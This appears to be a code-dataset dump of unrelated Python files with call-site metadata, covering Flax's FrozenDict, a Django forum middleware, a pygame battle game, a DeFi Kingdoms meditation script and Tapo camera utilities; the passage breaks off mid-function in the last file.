| [((122, 4, 122, 18), 'fire.Fire', 'fire.Fire', ({(122, 14, 122, 17): 'cli'}, {}), '(cli)', False, 'import fire\n'), ((23, 0, 23, 31), 'logging.getLogger', 'logging.getLogger', ({(23, 18, 23, 30): '"""tensorflow"""'}, {}), "('tensorflow')", False, 'import logging\n'), ((43, 24, 43, 74), 'spellnn.layers.mapping.CharMapping', 'CharMapping', (), '', False, 'from spellnn.layers.mapping import CharMapping\n'), ((44, 25, 45, 88), 'spellnn.data.processing.DataProcessor', 'DataProcessor', (), '', False, 'from spellnn.data.processing import DataProcessor\n'), ((48, 22, 48, 36), 'spellnn.data.util.nb_lines', 'nb_lines', ({(48, 31, 48, 35): 'path'}, {}), '(path)', False, 'from spellnn.data.util import nb_lines\n'), ((55, 18, 55, 47), 'tensorflow.data.TextLineDataset', 'tf.data.TextLineDataset', ({(55, 42, 55, 46): 'path'}, {}), '(path)', True, 'import tensorflow as tf\n'), ((38, 53, 38, 70), 'spellnn.data.alphabet.get_chars', 'get_chars', ({(38, 63, 38, 69): 'locale'}, {}), '(locale)', False, 'from spellnn.data.alphabet import get_chars\n'), ((81, 13, 88, 12), 'textwrap.dedent', 'dedent', ({(81, 20, 88, 11): 'f"""\n def create({arg_str}):\n self.model = {name}(**locals())\n return self\n create.__name__ = {name}.__name__\n create.__doc__ = {name}.__init__.__doc__\n setattr(self, create.__name__, create)\n """'}, {}), '(\n f"""\n def create({arg_str}):\n self.model = {name}(**locals())\n return self\n create.__name__ = {name}.__name__\n create.__doc__ = {name}.__init__.__doc__\n setattr(self, create.__name__, create)\n """\n )', False, 'from textwrap import dedent\n'), ((60, 22, 60, 117), 'tensorflow.numpy_function', 'tf.numpy_function', (), '', True, 'import tensorflow as tf\n'), ((68, 22, 68, 117), 'tensorflow.numpy_function', 'tf.numpy_function', (), '', True, 'import tensorflow as tf\n'), ((96, 18, 96, 31), 'pathlib.Path', 'Path', ({(96, 23, 96, 30): 'log_dir'}, {}), '(log_dir)', False, 'from pathlib import Path\n'), ((110, 61, 110, 75), 'os.cpu_count', 'os.cpu_count', ({}, {}), '()', False, 'import os\n'), ((112, 16, 112, 32), 'tensorflow.keras.callbacks.TerminateOnNaN', 'TerminateOnNaN', ({}, {}), '()', False, 'from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard, TerminateOnNaN\n'), ((113, 16, 113, 44), 'tensorflow.keras.callbacks.TensorBoard', 'TensorBoard', (), '', False, 'from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard, TerminateOnNaN\n'), ((114, 16, 114, 99), 'tensorflow.keras.callbacks.ModelCheckpoint', 'ModelCheckpoint', (), '', False, 'from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard, TerminateOnNaN\n'), ((115, 16, 115, 72), 'tensorflow.keras.callbacks.EarlyStopping', 'EarlyStopping', (), '', False, 'from tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint, TensorBoard, TerminateOnNaN\n'), ((97, 21, 97, 34), 'pathlib.Path', 'Path', ({(97, 26, 97, 33): 'log_dir'}, {}), '(log_dir)', False, 'from pathlib import Path\n'), ((96, 41, 96, 55), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n')] |
juliuskunze/flax | flax/core/frozen_dict.py | 929395cf5c7391bca3e33ef6760ff9591401d19e | # Copyright 2020 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Frozen Dictionary."""
from typing import TypeVar, Mapping, Dict, Tuple
from flax import serialization
import jax
K = TypeVar('K')
V = TypeVar('V')
@jax.tree_util.register_pytree_node_class
class FrozenDict(Mapping[K, V]):
"""An immutable variant of the Python dict."""
__slots__ = ('_dict', '_hash')
def __init__(self, *args, **kwargs):
self._dict = dict(*args, **kwargs)
self._hash = None
def __getitem__(self, key):
v = self._dict[key]
if isinstance(v, dict):
return FrozenDict(v)
return v
def __setitem__(self, key, value):
raise ValueError('FrozenDict is immutable.')
def __contains__(self, key):
return key in self._dict
def __iter__(self):
return iter(self._dict)
def __len__(self):
return len(self._dict)
def __repr__(self):
return 'FrozenDict(%r)' % self._dict
def __hash__(self):
if self._hash is None:
h = 0
for key, value in self.items():
h ^= hash((key, value))
self._hash = h
return self._hash
def copy(self, add_or_replace: Mapping[K, V]) -> 'FrozenDict[K, V]':
"""Create a new FrozenDict with additional or replaced entries."""
return type(self)(self, **unfreeze(add_or_replace))
def items(self):
for key in self._dict:
yield (key, self[key])
def pop(self, key: K) -> Tuple['FrozenDict[K, V]', V]:
"""Create a new FrozenDict where one entry is removed.
Example::
state, params = variables.pop('params')
Args:
key: the key to remove from the dict
Returns:
A pair with the new FrozenDict and the removed value.
"""
value = self[key]
new_dict = dict(self._dict)
new_dict.pop(key)
new_self = type(self)(new_dict)
return new_self, value
def unfreeze(self) -> Dict[K, V]:
return unfreeze(self)
def tree_flatten(self):
return (self._dict,), ()
@classmethod
def tree_unflatten(cls, _, data):
return cls(*data)
def freeze(xs: Dict[K, V]) -> FrozenDict[K, V]:
"""Freeze a nested dict.
Makes a nested `dict` immutable by transforming it into `FrozenDict`.
"""
# Turn the nested FrozenDict into a dict. This way the internal data structure
# of FrozenDict does not contain any FrozenDicts.
# instead we create those lazily in `__getitem__`.
# As a result tree_flatten/unflatten will be fast
# because it operates on native dicts.
xs = unfreeze(xs)
return FrozenDict(xs)
def unfreeze(x: FrozenDict[K, V]) -> Dict[K, V]:
"""Unfreeze a FrozenDict.
Makes a mutable copy of a `FrozenDict` mutable by transforming
it into (nested) dict.
"""
if not isinstance(x, (FrozenDict, dict)):
return x
ys = {}
for key, value in x.items():
ys[key] = unfreeze(value)
return ys
def _frozen_dict_state_dict(xs):
return {key: serialization.to_state_dict(value) for key, value in xs.items()}
def _restore_frozen_dict(xs, states):
return freeze(
{key: serialization.from_state_dict(value, states[key])
for key, value in xs.items()})
serialization.register_serialization_state(
FrozenDict,
_frozen_dict_state_dict,
_restore_frozen_dict)
| [((23, 4, 23, 16), 'typing.TypeVar', 'TypeVar', ({(23, 12, 23, 15): '"""K"""'}, {}), "('K')", False, 'from typing import TypeVar, Mapping, Dict, Tuple\n'), ((24, 4, 24, 16), 'typing.TypeVar', 'TypeVar', ({(24, 12, 24, 15): '"""V"""'}, {}), "('V')", False, 'from typing import TypeVar, Mapping, Dict, Tuple\n'), ((140, 0, 143, 25), 'flax.serialization.register_serialization_state', 'serialization.register_serialization_state', ({(141, 4, 141, 14): 'FrozenDict', (142, 4, 142, 27): '_frozen_dict_state_dict', (143, 4, 143, 24): '_restore_frozen_dict'}, {}), '(FrozenDict,\n _frozen_dict_state_dict, _restore_frozen_dict)', False, 'from flax import serialization\n'), ((131, 15, 131, 49), 'flax.serialization.to_state_dict', 'serialization.to_state_dict', ({(131, 43, 131, 48): 'value'}, {}), '(value)', False, 'from flax import serialization\n'), ((136, 12, 136, 61), 'flax.serialization.from_state_dict', 'serialization.from_state_dict', ({(136, 42, 136, 47): 'value', (136, 49, 136, 60): 'states[key]'}, {}), '(value, states[key])', False, 'from flax import serialization\n')] |
grigi/pybbm | pybb/middleware.py | 9ecc5e7fadf4da820d2fc2c22914e14f3545047d | # -*- coding: utf-8 -*-
from django.utils import translation
from django.db.models import ObjectDoesNotExist
from pybb import util
from pybb.signals import user_saved
class PybbMiddleware(object):
def process_request(self, request):
if request.user.is_authenticated():
try:
# Here we try to load profile, but can get error
# if user created during syncdb but profile model
# under south control. (Like pybb.Profile).
profile = util.get_pybb_profile(request.user)
except ObjectDoesNotExist:
# Ok, we should create new profile for this user
# and grant permissions for add posts
user_saved(request.user, created=True)
profile = util.get_pybb_profile(request.user)
language = translation.get_language_from_request(request)
if not profile.language:
profile.language = language
profile.save()
if profile.language and profile.language != language:
request.session['django_language'] = profile.language
translation.activate(profile.language)
request.LANGUAGE_CODE = translation.get_language()
| [((24, 23, 24, 69), 'django.utils.translation.get_language_from_request', 'translation.get_language_from_request', ({(24, 61, 24, 68): 'request'}, {}), '(request)', False, 'from django.utils import translation\n'), ((17, 26, 17, 61), 'pybb.util.get_pybb_profile', 'util.get_pybb_profile', ({(17, 48, 17, 60): 'request.user'}, {}), '(request.user)', False, 'from pybb import util\n'), ((32, 16, 32, 54), 'django.utils.translation.activate', 'translation.activate', ({(32, 37, 32, 53): 'profile.language'}, {}), '(profile.language)', False, 'from django.utils import translation\n'), ((33, 40, 33, 66), 'django.utils.translation.get_language', 'translation.get_language', ({}, {}), '()', False, 'from django.utils import translation\n'), ((21, 16, 21, 54), 'pybb.signals.user_saved', 'user_saved', (), '', False, 'from pybb.signals import user_saved\n'), ((22, 26, 22, 61), 'pybb.util.get_pybb_profile', 'util.get_pybb_profile', ({(22, 48, 22, 60): 'request.user'}, {}), '(request.user)', False, 'from pybb import util\n')] |
s0h3ck/streetlite | streetlite/common/constants.py | 21db388702f828417dd3dc0fbfa5af757216e1e0 | from enum import Enum
class CustomEnum(Enum):
@classmethod
def has_value(cls, value):
return any(value == item.value for item in cls)
@classmethod
def from_value(cls, value):
found_element = None
if cls.has_value(value):
found_element = cls(value)
return found_element
class Direction(CustomEnum):
EAST = 0x1
SOUTH = 0x2
WEST = 0x3
NORTH = 0x4
class Action(CustomEnum):
FLASH_RED = 0x32
GREEN = 0x33
FLASH_GREEN = 0x34
PEDESTRIAN = 0x35
EMERGENCY = 0x37
class Intersection(CustomEnum):
A = 0x62
B = 0x61
BOTH = 0x63
class Mode(CustomEnum):
LIVE = 0
SIMULATION = 1 | [] |
achien/advent-of-code-2021 | day5.py | 8851e1727975ea8124db78b54fe577fbf2e5883d | import fileinput
counts = {}
for line in fileinput.input():
line = line.strip()
p1, p2 = line.split('>')
p1 = p1[:-2]
x1, y1 = p1.split(',')
x1 = int(x1)
y1 = int(y1)
p2 = p2[1:]
x2, y2 = p2.split(',')
x2 = int(x2)
y2 = int(y2)
if x1 == x2:
dx = 0
elif x1 > x2:
dx = -1
else:
dx = 1
if y1 == y2:
dy = 0
elif y1 > y2:
dy = -1
else:
dy = 1
x = x1
y = y1
while True:
pt = (x, y)
counts[pt] = counts.get(pt, 0) + 1
if x == x2 and y == y2:
break
x += dx
y += dy
n = 0
for _, ct in counts.items():
if ct > 1:
n += 1
print(n) | [((4, 12, 4, 29), 'fileinput.input', 'fileinput.input', ({}, {}), '()', False, 'import fileinput\n')] |
sodapopinsky/dfk | meditation_example.py | be48e89d4b054ad8abbb009d0e1ea4c10f559af5 | import logging
from web3 import Web3
import sys
import time
import meditation.meditation as meditation
if __name__ == "__main__":
log_format = '%(asctime)s|%(name)s|%(levelname)s: %(message)s'
logger = logging.getLogger("DFK-meditation")
logger.setLevel(logging.DEBUG)
logging.basicConfig(level=logging.INFO, format=log_format, stream=sys.stdout)
rpc_server = 'https://api.harmony.one'
logger.info("Using RPC server " + rpc_server)
private_key = None # set private key
account_address = '0x2E7669F61eA77F02445A015FBdcFe2DE47083E02'
gas_price_gwei = 10
tx_timeout_seconds = 30
w3 = Web3(Web3.HTTPProvider(rpc_server))
active_meditations = meditation.get_active_meditations(account_address, rpc_server)
logger.info("Pending meditation on address " + str(account_address) + ": "+str(active_meditations))
level = 1
hero_id = 1
required_runes = meditation.get_required_runes(level, rpc_server)
meditation.start_meditation(1, meditation.stat2id('strength'), meditation.stat2id('endurance'), meditation.stat2id('luck'),
meditation.ZERO_ADDRESS, private_key, w3.eth.getTransactionCount(account_address),
gas_price_gwei, tx_timeout_seconds, rpc_server, logger)
hero_meditation = meditation.get_hero_meditation(hero_id, rpc_server)
logger.info("Pending meditation "+str(hero_meditation))
time.sleep(5)
meditation.complete_meditation(hero_id, private_key, w3.eth.getTransactionCount(account_address),
gas_price_gwei, tx_timeout_seconds, rpc_server, logger)
| [((11, 13, 11, 48), 'logging.getLogger', 'logging.getLogger', ({(11, 31, 11, 47): '"""DFK-meditation"""'}, {}), "('DFK-meditation')", False, 'import logging\n'), ((13, 4, 13, 81), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((24, 25, 24, 87), 'meditation.meditation.get_active_meditations', 'meditation.get_active_meditations', ({(24, 59, 24, 74): 'account_address', (24, 76, 24, 86): 'rpc_server'}, {}), '(account_address, rpc_server)', True, 'import meditation.meditation as meditation\n'), ((29, 21, 29, 69), 'meditation.meditation.get_required_runes', 'meditation.get_required_runes', ({(29, 51, 29, 56): 'level', (29, 58, 29, 68): 'rpc_server'}, {}), '(level, rpc_server)', True, 'import meditation.meditation as meditation\n'), ((33, 22, 33, 73), 'meditation.meditation.get_hero_meditation', 'meditation.get_hero_meditation', ({(33, 53, 33, 60): 'hero_id', (33, 62, 33, 72): 'rpc_server'}, {}), '(hero_id, rpc_server)', True, 'import meditation.meditation as meditation\n'), ((35, 4, 35, 17), 'time.sleep', 'time.sleep', ({(35, 15, 35, 16): '(5)'}, {}), '(5)', False, 'import time\n'), ((22, 14, 22, 43), 'web3.Web3.HTTPProvider', 'Web3.HTTPProvider', ({(22, 32, 22, 42): 'rpc_server'}, {}), '(rpc_server)', False, 'from web3 import Web3\n'), ((30, 35, 30, 65), 'meditation.meditation.stat2id', 'meditation.stat2id', ({(30, 54, 30, 64): '"""strength"""'}, {}), "('strength')", True, 'import meditation.meditation as meditation\n'), ((30, 67, 30, 98), 'meditation.meditation.stat2id', 'meditation.stat2id', ({(30, 86, 30, 97): '"""endurance"""'}, {}), "('endurance')", True, 'import meditation.meditation as meditation\n'), ((30, 100, 30, 126), 'meditation.meditation.stat2id', 'meditation.stat2id', ({(30, 119, 30, 125): '"""luck"""'}, {}), "('luck')", True, 'import meditation.meditation as meditation\n')] |
JohnStarich/dotfiles | python/johnstarich/interval.py | eaa07b09aa02fc2fa2516cebdd3628b4daf506e4 | import time
class Interval(object):
def __init__(self, delay_time: int):
self.delay_time = delay_time
self.current_time = 0
@staticmethod
def now():
return time.gmtime().tm_sec
def should_run(self) -> bool:
if self.current_time == 0:
self.current_time = Interval.now()
return True
return self.is_done()
def is_done(self) -> bool:
timestamp = Interval.now()
return self.current_time + self.delay_time < timestamp or \
self.current_time > timestamp
def start(self) -> int:
self.current_time = Interval.now()
return self.current_time
| [((11, 15, 11, 28), 'time.gmtime', 'time.gmtime', ({}, {}), '()', False, 'import time\n')] |
opencoweb/coweb | servers/python/coweb/bot/wrapper/object.py | 7b3a87ee9eda735a859447d404ee16edde1c5671 | '''
Copyright (c) The Dojo Foundation 2011. All Rights Reserved.
Copyright (c) IBM Corporation 2008, 2011. All Rights Reserved.
'''
# tornado
import tornado.ioloop
# std lib
import logging
import time
import weakref
import functools
# coweb
from .base import BotWrapperBase
log = logging.getLogger('coweb.bot')
class ObjectBotWrapper(BotWrapperBase):
def __init__(self, manager, botClass, serviceName, serviceToken, appData):
self.serviceName = serviceName
self.appData = appData
self._serviceToken = serviceToken
self._manager = weakref.proxy(manager)
self._bot = botClass(self, serviceName, appData)
self._ioLoop = tornado.ioloop.IOLoop.instance()
# asynchronously inform local manager we're ready
self.add_callback(self._manager.on_bot_ready,
serviceName, serviceToken, self)
def on_message(self, mtdName, *args):
'''Proxy messages from manager to bot impl.'''
try:
mtd = getattr(self._bot, mtdName)
except AttributeError:
# bot isn't listening for this message type
return
# keep sync with manager so we can catch exceptions, else exception
# fires in context of original request which is wrong, it's a bot
# error not a client error
try:
mtd(*args)
except Exception:
log.exception('bot error')
def reply(self, replyToken, data):
'''Sends a private reply to a requestor.'''
self._manager.on_bot_response(self.serviceName, replyToken, data)
def publish(self, data):
'''Sends a public reply to subscribes on a bot subchannel.'''
self._manager.on_bot_publish(self.serviceName, data)
def add_callback(self, callback, *args, **kwargs):
'''Schedule a callback in the main loop.'''
f = functools.partial(callback, *args, **kwargs)
self._ioLoop.add_callback(f)
def add_timer(self, delay, callback, *args, **kwargs):
'''Add a one-shot timer that schedules a main loop callback.'''
f = functools.partial(callback, *args, **kwargs)
return self._ioLoop.add_timeout(time.time() + delay, f)
def remove_timer(self, timer):
'''Remove a one-shot timer.'''
self._ioLoop.remove_timeout(timer)
| [((15, 6, 15, 36), 'logging.getLogger', 'logging.getLogger', ({(15, 24, 15, 35): '"""coweb.bot"""'}, {}), "('coweb.bot')", False, 'import logging\n'), ((22, 24, 22, 46), 'weakref.proxy', 'weakref.proxy', ({(22, 38, 22, 45): 'manager'}, {}), '(manager)', False, 'import weakref\n'), ((55, 12, 55, 56), 'functools.partial', 'functools.partial', ({(55, 30, 55, 38): 'callback', (55, 40, 55, 45): '*args'}, {}), '(callback, *args, **kwargs)', False, 'import functools\n'), ((60, 12, 60, 56), 'functools.partial', 'functools.partial', ({(60, 30, 60, 38): 'callback', (60, 40, 60, 45): '*args'}, {}), '(callback, *args, **kwargs)', False, 'import functools\n'), ((61, 40, 61, 51), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n')] |
lankotiAditya/RPG_battle_main | battle_tut5.py | 0063941d023ff1c18a6b050fab4d0c7ec583b11a | import pygame
import random
pygame.init()
clock = pygame.time.Clock()
fps = 60
#game window
bottom_panel = 150
screen_width = 800
screen_height = 400 + bottom_panel
screen = pygame.display.set_mode((screen_width, screen_height))
pygame.display.set_caption('Battle')
#define game variables
current_fighter = 1
total_fighters = 3
action_cooldown = 0
action_wait_time = 90
attack = False
potion = False
clicked = False
#define fonts
font = pygame.font.SysFont('Times New Roman', 26)
#define colours
red = (255, 0, 0)
green = (0, 255, 0)
#load images
#background image
background_img = pygame.image.load('img/Background/background.png').convert_alpha()
#panel image
panel_img = pygame.image.load('img/Icons/panel.png').convert_alpha()
#sword image
sword_img = pygame.image.load('img/Icons/sword.png').convert_alpha()
#create function for drawing text
def draw_text(text, font, text_col, x, y):
img = font.render(text, True, text_col)
screen.blit(img, (x, y))
#function for drawing background
def draw_bg():
screen.blit(background_img, (0, 0))
#function for drawing panel
def draw_panel():
#draw panel rectangle
screen.blit(panel_img, (0, screen_height - bottom_panel))
#show knight stats
draw_text(f'{knight.name} HP: {knight.hp}', font, red, 100, screen_height - bottom_panel + 10)
for count, i in enumerate(bandit_list):
#show name and health
draw_text(f'{i.name} HP: {i.hp}', font, red, 550, (screen_height - bottom_panel + 10) + count * 60)
#fighter class
class Fighter():
def __init__(self, x, y, name, max_hp, strength, potions):
self.name = name
self.max_hp = max_hp
self.hp = max_hp
self.strength = strength
self.start_potions = potions
self.potions = potions
self.alive = True
self.animation_list = []
self.frame_index = 0
self.action = 0#0:idle, 1:attack, 2:hurt, 3:dead
self.update_time = pygame.time.get_ticks()
#load idle images
temp_list = []
for i in range(8):
img = pygame.image.load(f'img/{self.name}/Idle/{i}.png')
img = pygame.transform.scale(img, (img.get_width() * 3, img.get_height() * 3))
temp_list.append(img)
self.animation_list.append(temp_list)
#load attack images
temp_list = []
for i in range(8):
img = pygame.image.load(f'img/{self.name}/Attack/{i}.png')
img = pygame.transform.scale(img, (img.get_width() * 3, img.get_height() * 3))
temp_list.append(img)
self.animation_list.append(temp_list)
self.image = self.animation_list[self.action][self.frame_index]
self.rect = self.image.get_rect()
self.rect.center = (x, y)
def update(self):
animation_cooldown = 100
#handle animation
#update image
self.image = self.animation_list[self.action][self.frame_index]
#check if enough time has passed since the last update
if pygame.time.get_ticks() - self.update_time > animation_cooldown:
self.update_time = pygame.time.get_ticks()
self.frame_index += 1
#if the animation has run out then reset back to the start
if self.frame_index >= len(self.animation_list[self.action]):
self.idle()
def idle(self):
#set variables to attack animation
self.action = 0
self.frame_index = 0
self.update_time = pygame.time.get_ticks()
def attack(self, target):
#deal damage to enemy
rand = random.randint(-5, 5)
damage = self.strength + rand
target.hp -= damage
#check if target has died
if target.hp < 1:
target.hp = 0
target.alive = False
#set variables to attack animation
self.action = 1
self.frame_index = 0
self.update_time = pygame.time.get_ticks()
def draw(self):
screen.blit(self.image, self.rect)
class HealthBar():
def __init__(self, x, y, hp, max_hp):
self.x = x
self.y = y
self.hp = hp
self.max_hp = max_hp
def draw(self, hp):
#update with new health
self.hp = hp
#calculate health ratio
ratio = self.hp / self.max_hp
pygame.draw.rect(screen, red, (self.x, self.y, 150, 20))
pygame.draw.rect(screen, green, (self.x, self.y, 150 * ratio, 20))
knight = Fighter(200, 260, 'Knight', 30, 10, 3)
bandit1 = Fighter(550, 270, 'Bandit', 20, 6, 1)
bandit2 = Fighter(700, 270, 'Bandit', 20, 6, 1)
bandit_list = []
bandit_list.append(bandit1)
bandit_list.append(bandit2)
knight_health_bar = HealthBar(100, screen_height - bottom_panel + 40, knight.hp, knight.max_hp)
bandit1_health_bar = HealthBar(550, screen_height - bottom_panel + 40, bandit1.hp, bandit1.max_hp)
bandit2_health_bar = HealthBar(550, screen_height - bottom_panel + 100, bandit2.hp, bandit2.max_hp)
run = True
while run:
clock.tick(fps)
#draw background
draw_bg()
#draw panel
draw_panel()
knight_health_bar.draw(knight.hp)
bandit1_health_bar.draw(bandit1.hp)
bandit2_health_bar.draw(bandit2.hp)
#draw fighters
knight.update()
knight.draw()
for bandit in bandit_list:
bandit.update()
bandit.draw()
#control player actions
#reset action variables
attack = False
potion = False
target = None
#make sure mouse is visible
pygame.mouse.set_visible(True)
pos = pygame.mouse.get_pos()
for count, bandit in enumerate(bandit_list):
if bandit.rect.collidepoint(pos):
#hide mouse
pygame.mouse.set_visible(False)
#show sword in place of mouse cursor
screen.blit(sword_img, pos)
if clicked == True:
attack = True
target = bandit_list[count]
#player action
if knight.alive == True:
if current_fighter == 1:
action_cooldown += 1
if action_cooldown >= action_wait_time:
#look for player action
#attack
if attack == True and target != None:
knight.attack(target)
current_fighter += 1
action_cooldown = 0
#enemy action
for count, bandit in enumerate(bandit_list):
if current_fighter == 2 + count:
if bandit.alive == True:
action_cooldown += 1
if action_cooldown >= action_wait_time:
#attack
bandit.attack(knight)
current_fighter += 1
action_cooldown = 0
else:
current_fighter += 1
#if all fighters have had a turn then reset
if current_fighter > total_fighters:
current_fighter = 1
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
if event.type == pygame.MOUSEBUTTONDOWN:
clicked = True
else:
clicked = False
pygame.display.update()
pygame.quit()
| [((4, 0, 4, 13), 'pygame.init', 'pygame.init', ({}, {}), '()', False, 'import pygame\n'), ((6, 8, 6, 27), 'pygame.time.Clock', 'pygame.time.Clock', ({}, {}), '()', False, 'import pygame\n'), ((14, 9, 14, 63), 'pygame.display.set_mode', 'pygame.display.set_mode', ({(14, 33, 14, 62): '(screen_width, screen_height)'}, {}), '((screen_width, screen_height))', False, 'import pygame\n'), ((15, 0, 15, 36), 'pygame.display.set_caption', 'pygame.display.set_caption', ({(15, 27, 15, 35): '"""Battle"""'}, {}), "('Battle')", False, 'import pygame\n'), ((29, 7, 29, 49), 'pygame.font.SysFont', 'pygame.font.SysFont', ({(29, 27, 29, 44): '"""Times New Roman"""', (29, 46, 29, 48): '26'}, {}), "('Times New Roman', 26)", False, 'import pygame\n'), ((257, 0, 257, 13), 'pygame.quit', 'pygame.quit', ({}, {}), '()', False, 'import pygame\n'), ((203, 1, 203, 31), 'pygame.mouse.set_visible', 'pygame.mouse.set_visible', ({(203, 26, 203, 30): '(True)'}, {}), '(True)', False, 'import pygame\n'), ((204, 7, 204, 29), 'pygame.mouse.get_pos', 'pygame.mouse.get_pos', ({}, {}), '()', False, 'import pygame\n'), ((247, 14, 247, 32), 'pygame.event.get', 'pygame.event.get', ({}, {}), '()', False, 'import pygame\n'), ((255, 1, 255, 24), 'pygame.display.update', 'pygame.display.update', ({}, {}), '()', False, 'import pygame\n'), ((37, 17, 37, 67), 'pygame.image.load', 'pygame.image.load', ({(37, 35, 37, 66): '"""img/Background/background.png"""'}, {}), "('img/Background/background.png')", False, 'import pygame\n'), ((39, 12, 39, 52), 'pygame.image.load', 'pygame.image.load', ({(39, 30, 39, 51): '"""img/Icons/panel.png"""'}, {}), "('img/Icons/panel.png')", False, 'import pygame\n'), ((41, 12, 41, 52), 'pygame.image.load', 'pygame.image.load', ({(41, 30, 41, 51): '"""img/Icons/sword.png"""'}, {}), "('img/Icons/sword.png')", False, 'import pygame\n'), ((81, 21, 81, 44), 'pygame.time.get_ticks', 'pygame.time.get_ticks', ({}, {}), '()', False, 'import pygame\n'), ((120, 21, 120, 44), 'pygame.time.get_ticks', 'pygame.time.get_ticks', ({}, {}), '()', False, 'import pygame\n'), ((125, 9, 125, 30), 'random.randint', 'random.randint', ({(125, 24, 125, 26): '-5', (125, 28, 125, 29): '5'}, {}), '(-5, 5)', False, 'import random\n'), ((135, 21, 135, 44), 'pygame.time.get_ticks', 'pygame.time.get_ticks', ({}, {}), '()', False, 'import pygame\n'), ((156, 2, 156, 58), 'pygame.draw.rect', 'pygame.draw.rect', ({(156, 19, 156, 25): 'screen', (156, 27, 156, 30): 'red', (156, 32, 156, 57): '(self.x, self.y, 150, 20)'}, {}), '(screen, red, (self.x, self.y, 150, 20))', False, 'import pygame\n'), ((157, 2, 157, 68), 'pygame.draw.rect', 'pygame.draw.rect', ({(157, 19, 157, 25): 'screen', (157, 27, 157, 32): 'green', (157, 34, 157, 67): '(self.x, self.y, 150 * ratio, 20)'}, {}), '(screen, green, (self.x, self.y, 150 * ratio, 20))', False, 'import pygame\n'), ((85, 9, 85, 59), 'pygame.image.load', 'pygame.image.load', ({(85, 27, 85, 58): 'f"""img/{self.name}/Idle/{i}.png"""'}, {}), "(f'img/{self.name}/Idle/{i}.png')", False, 'import pygame\n'), ((92, 9, 92, 61), 'pygame.image.load', 'pygame.image.load', ({(92, 27, 92, 60): 'f"""img/{self.name}/Attack/{i}.png"""'}, {}), "(f'img/{self.name}/Attack/{i}.png')", False, 'import pygame\n'), ((108, 22, 108, 45), 'pygame.time.get_ticks', 'pygame.time.get_ticks', ({}, {}), '()', False, 'import pygame\n'), ((208, 3, 208, 34), 'pygame.mouse.set_visible', 'pygame.mouse.set_visible', ({(208, 28, 208, 33): '(False)'}, {}), '(False)', False, 'import pygame\n'), ((107, 5, 107, 28), 'pygame.time.get_ticks', 'pygame.time.get_ticks', ({}, {}), '()', False, 'import pygame\n')] |
marinaoliveira96/python-exercises | curso_em_video/0087a.py | 13fc0ec30dec9bb6531cdeb41c80726971975835 | matriz = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
soma = col3 = maior = 0
for l in range(0, 3):
for c in range(0, 3):
matriz[l][c] = int(input(f'[{l}][{c}]: '))
for l in range(0, 3):
for c in range(0, 3):
print(f'[{matriz[l][c]:^5}]', end='')
if matriz[l][c] % 2 == 0:
soma += matriz[l][c]
print()
for l in range(0, 3):
col3 += matriz[l][2]
for c in range(0, 3):
if c == 0:
maior = matriz[1][c]
elif matriz[1][c] > maior:
maior = matriz[1][c]
print(f'A soma dos numeros pares é {soma}')
print(f'A soma dos valores da 3 coluna é {col3}')
print(f'O maior numero da 2 linha é {maior}') | [] |
david-kalbermatten/HomeAssistant-Tapo-Control | custom_components/tapo_control/utils.py | 3f9f8316cf7e176bb6f8d798d709f3c6d346a527 | import onvif
import os
import asyncio
import urllib.parse
from onvif import ONVIFCamera
from pytapo import Tapo
from .const import ENABLE_MOTION_SENSOR, DOMAIN, LOGGER, CLOUD_PASSWORD
from homeassistant.const import CONF_IP_ADDRESS, CONF_USERNAME, CONF_PASSWORD
from homeassistant.components.onvif.event import EventManager
from homeassistant.components.ffmpeg import DATA_FFMPEG
from haffmpeg.tools import IMAGE_JPEG, ImageFrame
def registerController(host, username, password):
return Tapo(host, username, password)
async def isRtspStreamWorking(hass, host, username, password):
_ffmpeg = hass.data[DATA_FFMPEG]
ffmpeg = ImageFrame(_ffmpeg.binary, loop=hass.loop)
username = urllib.parse.quote_plus(username)
password = urllib.parse.quote_plus(password)
streaming_url = f"rtsp://{username}:{password}@{host}:554/stream1"
image = await asyncio.shield(
ffmpeg.get_image(
streaming_url,
output_format=IMAGE_JPEG,
)
)
return not image == b""
async def initOnvifEvents(hass, host, username, password):
device = ONVIFCamera(
host,
2020,
username,
password,
f"{os.path.dirname(onvif.__file__)}/wsdl/",
no_cache=True,
)
try:
await device.update_xaddrs()
device_mgmt = device.create_devicemgmt_service()
device_info = await device_mgmt.GetDeviceInformation()
if "Manufacturer" not in device_info:
raise Exception("Onvif connection has failed.")
return device
except Exception:
pass
return False
async def getCamData(hass, controller):
camData = {}
presets = await hass.async_add_executor_job(controller.isSupportingPresets)
camData["user"] = controller.user
camData["basic_info"] = await hass.async_add_executor_job(controller.getBasicInfo)
camData["basic_info"] = camData["basic_info"]["device_info"]["basic_info"]
try:
motionDetectionData = await hass.async_add_executor_job(
controller.getMotionDetection
)
motion_detection_enabled = motionDetectionData["enabled"]
if motionDetectionData["digital_sensitivity"] == "20":
motion_detection_sensitivity = "low"
elif motionDetectionData["digital_sensitivity"] == "50":
motion_detection_sensitivity = "normal"
elif motionDetectionData["digital_sensitivity"] == "80":
motion_detection_sensitivity = "high"
else:
motion_detection_sensitivity = None
except Exception:
motion_detection_enabled = None
motion_detection_sensitivity = None
camData["motion_detection_enabled"] = motion_detection_enabled
camData["motion_detection_sensitivity"] = motion_detection_sensitivity
try:
privacy_mode = await hass.async_add_executor_job(controller.getPrivacyMode)
privacy_mode = privacy_mode["enabled"]
except Exception:
privacy_mode = None
camData["privacy_mode"] = privacy_mode
try:
alarmData = await hass.async_add_executor_job(controller.getAlarm)
alarm = alarmData["enabled"]
alarm_mode = alarmData["alarm_mode"]
except Exception:
alarm = None
alarm_mode = None
camData["alarm"] = alarm
